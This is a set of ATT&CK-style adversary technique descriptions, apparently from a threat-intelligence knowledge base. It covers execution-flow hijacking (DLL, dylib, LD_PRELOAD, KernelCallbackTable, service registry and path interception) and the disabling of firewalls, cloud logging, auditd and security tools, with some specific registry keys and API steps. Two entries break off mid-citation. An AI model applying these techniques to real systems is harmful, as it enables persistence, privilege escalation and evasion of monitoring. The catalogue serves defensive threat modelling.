Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.<sup>[[Microsoft Profiling Mar 2017](https://app.tidalcyber.com/references/eb0909ea-616c-4d79-b145-ee2f1ae539fb)]</sup><sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.<sup>[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]</sup>

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) provided by .NET processes.<sup>[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]</sup><sup>[[Red Canary COR_PROFILER May 2020](https://app.tidalcyber.com/references/3d8cb4d3-1cbe-416a-95b5-15003cbc2beb)]</sup><sup>[[Almond COR_PROFILER Apr 2019](https://app.tidalcyber.com/references/a49c5870-2a48-4cd7-8b4e-e80c5414f565)]</sup><sup>[[GitHub OmerYa Invisi-Shell](https://app.tidalcyber.com/references/26c1b8f4-ff59-409e-b616-04eee38a8a9f)]</sup><sup>[[subTee .NET Profilers May 2017](https://app.tidalcyber.com/references/6ef42019-5393-423e-811d-29b728c877e1)]</sup>

The tag is: misp-galaxy:technique="COR_PROFILER"

DLL Search Order Hijacking

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. <sup>[[Microsoft Dynamic Link Library Search Order](https://app.tidalcyber.com/references/7b1f945b-2547-4bc6-98bf-30248bdf3587)]</sup><sup>[[FireEye Hijacking July 2010](https://app.tidalcyber.com/references/536f9987-f3b6-4d5f-8a6b-32a0c651500d)]</sup> Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, <sup>[[OWASP Binary Planting](https://app.tidalcyber.com/references/86fc5a62-385e-4c56-9812-138db0808fba)]</sup> by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.<sup>[[FireEye fxsst June 2011](https://app.tidalcyber.com/references/06f8f5b2-2ebe-4210-84b6-f86e911a7118)]</sup> Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. <sup>[[Microsoft Security Advisory 2269637](https://app.tidalcyber.com/references/fa3d303e-bb1a-426d-9387-e92fc1ea75bc)]</sup>

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.<sup>[[Microsoft Dynamic-Link Library Redirection](https://app.tidalcyber.com/references/72458590-ee1b-4447-adb8-ca4f486d1db5)]</sup><sup>[[Microsoft Manifests](https://app.tidalcyber.com/references/e336dc02-c7bb-4046-93d9-17b9512fb731)]</sup><sup>[[FireEye DLL Search Order Hijacking](https://app.tidalcyber.com/references/0ba2675d-4d7f-406a-81fa-b87e62d7a539)]</sup>

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:technique="DLL Search Order Hijacking"

DLL Side-Loading

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.<sup>[[FireEye DLL Side-Loading](https://app.tidalcyber.com/references/9d58bcbb-5b96-4e12-8ff2-e0b084c3eb8c)]</sup>

The tag is: misp-galaxy:technique="DLL Side-Loading"

Dylib Hijacking

Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.

Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.<sup>[[Wardle Dylib Hijack Vulnerable Apps](https://app.tidalcyber.com/references/128b4e3f-bb58-45e0-b8d9-bff9fc3ec3df)]</sup><sup>[[Wardle Dylib Hijacking OSX 2015](https://app.tidalcyber.com/references/c78d8c94-4fe3-4aa9-b879-f0b0e9d2714b)]</sup><sup>[[Github EmpireProject HijackScanner](https://app.tidalcyber.com/references/c83e8833-9648-4178-b5be-6fa0af8f737f)]</sup><sup>[[Github EmpireProject CreateHijacker Dylib](https://app.tidalcyber.com/references/2908418d-54cf-4245-92c6-63f616b04e91)]</sup> Dylibs are loaded into an application’s address space allowing the malicious dylib to inherit the application’s privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup><sup>[[wardle artofmalware volume1](https://app.tidalcyber.com/references/53d0279e-4f30-4bbe-a9c7-90e36cd81570)]</sup><sup>[[MalwareUnicorn macOS Dylib Injection MachO](https://app.tidalcyber.com/references/61aae3a4-317e-4117-a02a-27885709fb07)]</sup>

The tag is: misp-galaxy:technique="Dylib Hijacking"

Dynamic Linker Hijacking

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup><sup>[[Apple Doco Archive Dynamic Libraries](https://app.tidalcyber.com/references/e3b8cc52-2096-418c-b291-1bc76022961d)]</sup> These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.<sup>[[Baeldung LD_PRELOAD](https://app.tidalcyber.com/references/6fd6ea96-1cf4-4169-8069-4f29dbc9f217)]</sup>

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary’s malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.<sup>[[Man LD.SO](https://app.tidalcyber.com/references/a8a16cf6-0482-4e98-a39a-496491f985df)]</sup><sup>[[TLDP Shared Libraries](https://app.tidalcyber.com/references/2862845b-72b3-41d8-aafb-b36e90c6c30a)]</sup> Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.<sup>[[Code Injection on Linux and macOS](https://app.tidalcyber.com/references/82d41fd8-495d-41b6-b908-6ada5764c94d)]</sup><sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup> <sup>[[Phrack halfdead 1997](https://app.tidalcyber.com/references/9b3f0dc7-d830-43c5-8a5b-ad3c811920c5)]</sup><sup>[[Brown Exploiting Linkers](https://app.tidalcyber.com/references/24674e91-5cbf-4023-98ae-a9f0968ad99a)]</sup>

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.<sup>[[TheEvilBit DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/bd27026c-81eb-480e-b092-f861472ac775)]</sup><sup>[[Timac DYLD_INSERT_LIBRARIES](https://app.tidalcyber.com/references/54fcbc49-f4e3-48a4-9d67-52ca08b322b2)]</sup><sup>[[Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass](https://app.tidalcyber.com/references/67f3ce33-0197-41ef-a9d0-474c97ecf570)]</sup>

The tag is: misp-galaxy:technique="Dynamic Linker Hijacking"

Executable Installer File Permissions Weakness

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d). Several examples of this weakness in existing common installers have been reported to software vendors.<sup>[[mozilla_sec_adv_2012](https://app.tidalcyber.com/references/cd720550-a0b5-4d1d-85dd-98da97f45b62)]</sup> <sup>[[Executable Installers are Vulnerable](https://app.tidalcyber.com/references/5c2791d4-556d-426a-b305-44e23b50f013)]</sup> If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:technique="Executable Installer File Permissions Weakness"

KernelCallbackTable

Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup><sup>[[FinFisher exposed ](https://app.tidalcyber.com/references/b2f4541e-f981-4b25-abf4-1bec92b16faa)]</sup> The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.<sup>[[Windows Process Injection KernelCallbackTable](https://app.tidalcyber.com/references/01a3fc64-ff07-48f7-b0d9-5728012761c7)]</sup>

An adversary may hijack the execution flow of a process using the <code>KernelCallbackTable</code> by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) or [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) into another process.

A pointer to the memory address of the <code>KernelCallbackTable</code> can be obtained by locating the PEB (ex: via a call to the <code>NtQueryInformationProcess()</code> [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) function).<sup>[[NtQueryInformationProcess](https://app.tidalcyber.com/references/7b533ca9-9075-408d-b125-89bc7446ec8f)]</sup> Once the pointer is located, the <code>KernelCallbackTable</code> can be duplicated, and a function in the table (e.g., <code>fnCOPYDATA</code>) set to the address of a malicious payload (ex: via <code>WriteProcessMemory()</code>). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup>

The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the <code>KernelCallbackTable</code> may also be restored to its original state by the rest of the malicious payload.<sup>[[Lazarus APT January 2022](https://app.tidalcyber.com/references/fbd96014-16c3-4ad6-bb3f-f92d15efce13)]</sup> Use of the <code>KernelCallbackTable</code> to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.

The tag is: misp-galaxy:technique="KernelCallbackTable"

Path Interception by PATH Environment Variable

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows if an adversary places a malicious program named "net.exe" in C:\example path, which by default precedes C:\Windows\system32\net.exe in the PATH environment variable, when "net" is executed from the command-line the C:\example path will be called instead of the system’s legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter]([ExpressVPN PATH env Windows 2021(https://app.tidalcyber.com/references/26096485-1dd6-512a-a2a1-27dbbfb6fde0)]</sup>

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://app.tidalcyber.com/technique/cc5ae19f-981d-4004-bb74-260b8ebad73a), or modifying the /etc/paths.d folder contents.<sup>[[uptycs Fake POC linux malware 2023](https://app.tidalcyber.com/references/edc18649-2fcf-5fb3-a717-db4bb28ca25f)]</sup><sup>[[nixCraft macOS PATH variables](https://app.tidalcyber.com/references/83daecf1-8708-56da-aaad-1e7e95c4ea43)]</sup><sup>[[Elastic Rules macOS launchctl 2022](https://app.tidalcyber.com/references/04b0582e-357f-5f2a-8582-b3bf8f52c2a2)]</sup>

The tag is: misp-galaxy:technique="Path Interception by PATH Environment Variable"

Path Interception by Search Order Hijacking

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6), the search order differs depending on the method that is used to execute the program. <sup>[[Microsoft CreateProcess](https://app.tidalcyber.com/references/aa336e3a-464d-48ce-bebb-760b73764610)]</sup> <sup>[[Windows NT Command Shell](https://app.tidalcyber.com/references/aee1e76c-8ff2-4ff0-83e3-edcb76f34d19)]</sup> <sup>[[Microsoft WinExec](https://app.tidalcyber.com/references/9e1ae9ae-bafc-460a-891e-e75df01c96c4)]</sup> However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. <sup>[[Microsoft Environment Property](https://app.tidalcyber.com/references/64598969-864d-4bc7-805e-c289cccb7bc6)]</sup>

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://app.tidalcyber.com/technique/69cd62f8-b729-4a05-8351-5bb961f7c6d6).

The tag is: misp-galaxy:technique="Path Interception by Search Order Hijacking"

Path Interception by Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

Service paths <sup>[[Microsoft CurrentControlSet Services](https://app.tidalcyber.com/references/cb9b5391-773f-4b56-8c41-d4f548c7b835)]</sup> and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). <sup>[[Help eliminate unquoted path](https://app.tidalcyber.com/references/23ad5a8c-cbe1-4f40-8757-f1784a4003a1)]</sup> (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. <sup>[[Windows Unquoted Services](https://app.tidalcyber.com/references/30681a0a-a49f-416a-b5bc-621c60f1130a)]</sup> <sup>[[Windows Privilege Escalation Guide](https://app.tidalcyber.com/references/185154f2-5f2e-48bf-b609-991e9d6a037b)]</sup>

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

The tag is: misp-galaxy:technique="Path Interception by Unquoted Path"

Services File Permissions Weakness

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:technique="Services File Permissions Weakness"

Services Registry Permissions Weakness

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), or [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532). Access to Registry keys is controlled through access control lists and user permissions. <sup>[[Registry Key Security](https://app.tidalcyber.com/references/f8f12cbb-029c-48b1-87ce-624a7f98c8ab)]</sup><sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service’s binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the <code>FailureCommand</code> key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.<sup>[[Kansa Service related collectors](https://app.tidalcyber.com/references/d854f84a-4d70-4ef4-9197-d8f5396feabb)]</sup><sup>[[Tweet Registry Perms Weakness](https://app.tidalcyber.com/references/7757776d-b0e9-4a99-8a55-2cd1b248c4a0)]</sup>

The <code>Performance</code> key contains the name of a driver service’s performance DLL and the names of several exported functions in the DLL.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup> If the <code>Performance</code> key is not already present and if an adversary-controlled user has the <code>Create Subkey</code> permission, adversaries may create the <code>Performance</code> key in the service’s Registry tree to point to a malicious DLL.<sup>[[insecure_reg_perms](https://app.tidalcyber.com/references/d18717ae-7fe4-40f9-aff2-b35120d31dc8)]</sup>

Adversaries may also add the <code>Parameters</code> key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.<sup>[[microsoft_services_registry_tree](https://app.tidalcyber.com/references/171cfdf1-d91c-4df3-831e-89b6237e3c8b)]</sup><sup>[[troj_zegost](https://app.tidalcyber.com/references/c3790ad6-704a-4076-8729-61b5df9d7983)]</sup> Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll</code>.<sup>[[malware_hides_service](https://app.tidalcyber.com/references/c5982f65-1782-452a-9667-a8732d31e89a)]</sup>

The tag is: misp-galaxy:technique="Services Registry Permissions Weakness"

Hijack Execution Flow

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:technique="Hijack Execution Flow"

Disable or Modify Cloud Firewall

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8).

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup><sup>[[Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022](https://app.tidalcyber.com/references/af755ba2-97c2-5152-ab00-2e24740f69f3)]</sup>

Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

The tag is: misp-galaxy:technique="Disable or Modify Cloud Firewall"

Disable or Modify Cloud Logs

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.<sup>[[Following the CloudTrail: Generating strong AWS security signals with Sumo Logic](https://app.tidalcyber.com/references/96560211-59b3-4eae-b8a3-2f988f6fdca3)]</sup> They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.<sup>[[AWS Update Trail](https://app.tidalcyber.com/references/a94e1e4a-2963-5563-a8a6-ab9f64a86476)]</sup><sup>[[Pacu Detection Disruption Module](https://app.tidalcyber.com/references/deba605b-7abc-5794-a820-448a395aab69)]</sup> In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.<sup>[[Dark Reading Microsoft 365 Attacks 2021](https://app.tidalcyber.com/references/f26d3aa4-6966-53c4-b9d1-848420377eae)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify Cloud Logs"

Disable or Modify Linux Audit System

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

Often referred to as auditd, this is the name of the daemon used to write events to disk and is governed by the parameters set in the audit.conf configuration file. Two primary ways to configure the log generation rules are through the command line auditctl utility and the file /etc/audit/audit.rules, containing a sequence of auditctl commands loaded at boot time.<sup>[[Red Hat System Auditing](https://app.tidalcyber.com/references/599337b3-8587-5578-9be5-e6e4f0edd0ef)]</sup><sup>[[IzyKnows auditd threat detection 2022](https://app.tidalcyber.com/references/8a2f5c37-df28-587e-81b8-4bf7bb796854)]</sup>

With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with auditd daemon or use systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules or audit.conf files to ignore malicious activity.<sup>[[Trustwave Honeypot SkidMap 2023](https://app.tidalcyber.com/references/300505ae-bb7a-503d-84c5-9ff021eb6f3a)]</sup><sup>[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify Linux Audit System"

Disable or Modify System Firewall

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port]([change_rdp_port_conti(https://app.tidalcyber.com/references/c0deb077-6c26-52f1-9e7c-d1fb535a02a0)]</sup>

The tag is: misp-galaxy:technique="Disable or Modify System Firewall"

Disable or Modify Tools

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.<sup>[[SCADAfence_ransomware](https://app.tidalcyber.com/references/24c80db5-37a7-46ee-b232-f3c3ffb10f0a)]</sup>

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.<sup>[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)]</sup><sup>[[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)]</sup>

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.<sup>[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]</sup>

On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.<sup>[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)]</sup><sup>[[Analysis of FG-IR-22-369](https://app.tidalcyber.com/references/f12b141e-6bb2-5563-9665-5756fec2d5e7)]</sup>

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

